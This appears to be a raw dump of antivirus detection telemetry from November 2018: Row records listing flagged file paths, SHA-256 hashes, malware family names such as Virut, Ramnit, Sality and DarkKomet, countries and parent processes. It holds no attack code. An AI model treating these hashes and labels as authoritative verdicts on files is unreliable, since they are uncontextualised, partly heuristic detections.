  Row(detection=Row(filename='gccustomhook.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\AdobeGCClient\\customhook\\gccustomhook.exe', filesize=1976000, name='W32/Sality.AT.#M1.#R1'), hash='f9ad4e88dc6d468f7e5dbaf4ee5246095b2c767ccd9da38dee4f1f149f917baf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe', parentsize=4014136, timestamp='2018-11-01T10:39:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa01a3cb3cc1f9b6be64b755a6c5d6523abfc1112d969a6ed51e5c96db11e793', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\FA01A3CB3CC1F9B6BE64B755A6C5D6523ABFC1112D969A6ED51E5C96DB11E793', filesize=576000, name='HEUR/AGEN.1001165.#M1.#R1'), hash='fa01a3cb3cc1f9b6be64b755a6c5d6523abfc1112d969a6ed51e5c96db11e793', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T06:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090526-c28c2751', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_75a40268\\AVSCAN-20181101-090241-A0FE7819\\AVSCAN-20181101-090526-C28C2751', filesize=128000, name='TR/Spy.128000.#M1.#R1'), hash='fa0c6b4221df4fc0ee96673e82a1d8886483d7f5ab11af5315b4fc2106acf7aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa41a0bd12206ff792eccb21633f5722d87019c93035ad5484faf186f3a6fae8', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_26.10.2018-1.available\\Avira\\FA41A0BD12206FF792ECCB21633F5722D87019C93035AD5484FAF186F3A6FAE8', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fa41a0bd12206ff792eccb21633f5722d87019c93035ad5484faf186f3a6fae8', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:51:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mohaa_server.exe', filepath='\\?\\J:\\Medal of honor\\MOHAA_server.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='fa467470419e316021cf5e2b3d3b7cce5a94667e60edf66faaf95a6daac19be9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fa49d490bd9e7199fd0fe2bb6485b4fe673edf33708cad126ac40693b00d51d7', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FA49D490BD9E7199FD0FE2BB6485B4FE673EDF33708CAD126AC40693B00D51D7', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='fa49d490bd9e7199fd0fe2bb6485b4fe673edf33708cad126ac40693b00d51d7', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:27:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r4rjods', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R4RJODS', filesize=64000, name='VBA/Dldr.Agent.mluun.#M1.#R1'), hash='fafbd357ed3a1742e58426e8a0b46c9ccc7543274499cac55713f559eabdbd78', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183207-489d3d41', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183207-489D3D41', filesize=64000, name='VBA/Dldr.Agent.mluun.#M1.#R1'), hash='fafbd357ed3a1742e58426e8a0b46c9ccc7543274499cac55713f559eabdbd78', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:32:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fb20317818efc5c33e6e6dca73e50886a2955c845ae55ff90619bfcc33a28e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FB20317818EFC5C33E6E6DCA73E50886A2955C845AE55FF90619BFCC33A28E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb20317818efc5c33e6e6dca73e50886a2955c845ae55ff90619bfcc33a28e9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FB953C7C09762CF0F87505902FB0F65D8508CE8ED30D12CEA90168EBB4A80A9A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fb953c7c09762cf0f87505902fb0f65d8508ce8ed30d12cea90168ebb4a80a9a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fba2075e58fee279ee3132c341f2ba7cb69ef7ce2d4f6c7f1b94eac024f7d1a5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FBA2075E58FEE279EE3132C341F2BA7CB69EF7CE2D4F6C7F1B94EAC024F7D1A5', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='fba2075e58fee279ee3132c341f2ba7cb69ef7ce2d4f6c7f1b94eac024f7d1a5', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:44:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211850-9c8cd400', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9eb27ea7\\AVSCAN-20181101-203610-81F5CAA1\\AVSCAN-20181101-211850-9C8CD400', filesize=24000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='fba35f6a347619c4d35e777e22339b45de5ef1d5ed93232ff4ad4b98d1154d3a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:18:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190505-f09831ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-190505-F09831EE', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ultraiso.exe', filepath='K:\\HBCD\\Programs\\UltraISO.exe', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='K:\\HBCD\\PStart.exe', parentsize=786952, timestamp='2018-11-01T17:01:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FBB824CB0F5A9380FE6745C68208E1913AB275012B94E75ED9CF4B7C1AED8B1E', filesize=768000, name='PUA/SoftPulse.aonb.#M1.#R1'), hash='fbb824cb0f5a9380fe6745c68208e1913ab275012b94e75ed9cf4b7c1aed8b1e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:44:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='slu5zrbvuf.exe', filepath='F:\\sLU5ZRBvUF.exe', filesize=5056000, name='HEUR/APC.#M1.#R1'), hash='fbcac9590f9e5f3e2a8e55a4ccdd9e318c39a1890b033e450ef311233924e63c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:36:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2_17_0_0.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\2_17_0_0.html', filesize=236000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='fc2f7e5fb2627fe9069b03dc2b945ef92ecce808bb02d9b847d9e6340c4300d9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:22:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tcmdlzma.dll', filepath='C:\\Program Files\\Total Commander\\TCMDLZMA.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='fc3085f8775dae313873e36020380939eb9c8cd52ea345f665e0955fb04bd209', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:58:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fc4ea35cb930699a0b1865ad4e339ff69495391ae3b12ef494589290ba1c226d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\FC4EA35CB930699A0B1865AD4E339FF69495391AE3B12EF494589290BA1C226D', filesize=576000, name='HEUR/AGEN.1022030.#M1.#R1'), hash='fc4ea35cb930699a0b1865ad4e339ff69495391ae3b12ef494589290ba1c226d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:45:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='fc9b363587f8099b675b884e18b8256bee8f32d5514196b515a57b18c7734279', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T13:54:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rnswe830.exe', filepath='C:\\Users\\X\\AppData\\Local\\032B0290-1429625764-057E-6806-180700080009\\rnswE830.exe', filesize=64000, name='HEUR/AGEN.1001886.#M1.#R1'), hash='fccdf318832dcd1c32a689bcbdb7b9de8a74773302e065fc5279faf02d71d703', metadata=Row(cmdline='\\\\\\/s \\\\\\"NortonSecurity\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files (x86)\\\\\\\\Norton AntiVirus\\\\\\\\Engine\\\\\\\\22.16.0.247\\\\\\\\diMaster.dll\\\\\\" \\\\\\/prefetch:1', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Norton AntiVirus\\Engine\\22.16.0.247\\NortonSecurity.exe', parentsize=328648, timestamp='2018-11-01T17:40:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='\\\\?\\C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='fcfc777ded4da2b405a0b7017de2cd22d9e6e6787a295f7c5704605dad5f6814', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cttunesvr.exe', filepath='\\\\?\\C:\\Windows\\System32\\cttunesvr.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='fcfc777ded4da2b405a0b7017de2cd22d9e6e6787a295f7c5704605dad5f6814', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T09:07:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T10:13:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T07:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T06:17:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T08:07:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T10:03:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T07:07:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T10:34:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4533e4a9e85a050f0f1c66ab9cc6a5f10e5aa9f77019406ae2ded86af00718', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:40:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='chickeninvadersrotyxmasinstaller320.exe', filepath='\\?\\J:\\العاب2\\حرب الفراخ 3\\ChickenInvadersROTYXmasInstaller320.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='fd4866d33bfd71f48abfe10e37e70bd42b80e23caa63bf27cd4f077e7ee3b9df', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='fd769a9c83d89f3ff40cf8b8cd651fee79f6133351a4e1522481a01c9c4e60f3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:00:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='fd769a9c83d89f3ff40cf8b8cd651fee79f6133351a4e1522481a01c9c4e60f3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T07:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fda1c81063bc59c14203b0fd321669e062bc7baf372456e61827f99d2b408552', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\FDA1C81063BC59C14203B0FD321669E062BC7BAF372456E61827F99D2B408552', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fda1c81063bc59c14203b0fd321669e062bc7baf372456e61827f99d2b408552', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:29:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fdb3729133d54830731fbd03d568aac3a4973afda794feec3266bf450bd049e0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\FDB3729133D54830731FBD03D568AAC3A4973AFDA794FEEC3266BF450BD049E0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='fdb3729133d54830731fbd03d568aac3a4973afda794feec3266bf450bd049e0', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:15:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wifeysworld.13.02.23.doctors.oral.exam.xxx.720p.mp4-ohrly.(incomplete) (2).rar', filepath='M:\\Neuer Ordner\\wizard\\alt.binaries.mom\\WifeysWorld.13.02.23.Doctors.Oral.Exam.XXX.720p.MP4-OHRLY.(incomplete) (2).rar', filesize=9216000, name='BDS/DarkKomet.cfes.#M1.#R1'), hash='fdb67984a3b8f6ed2422ac4b043ad30c4646902d752cb673f0400cbd6b90fd05', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='M:\\Tangysoft\\Tangysoft.exe', parentsize=4375552, timestamp='2018-11-01T17:57:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='заявка_университет_итмо_горнолыжный_спорт.exe', filepath='E:\\УФКиС\\Заявки на соревнования\\Заявка_Университет_ИТМО_горнолыжный_спорт.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='fdcce500c3a3dc6ecfed361274dcadab3f5e41b2e542763fd77b4d71fcbd2a99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T11:31:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144634-234b5315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_00648505\\AVSCAN-20181101-144046-0D01C425\\AVSCAN-20181101-144634-234B5315', filesize=1728000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='fdcce500c3a3dc6ecfed361274dcadab3f5e41b2e542763fd77b4d71fcbd2a99', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:59Z'), dt=datetime.date(2018, 11, 1)),
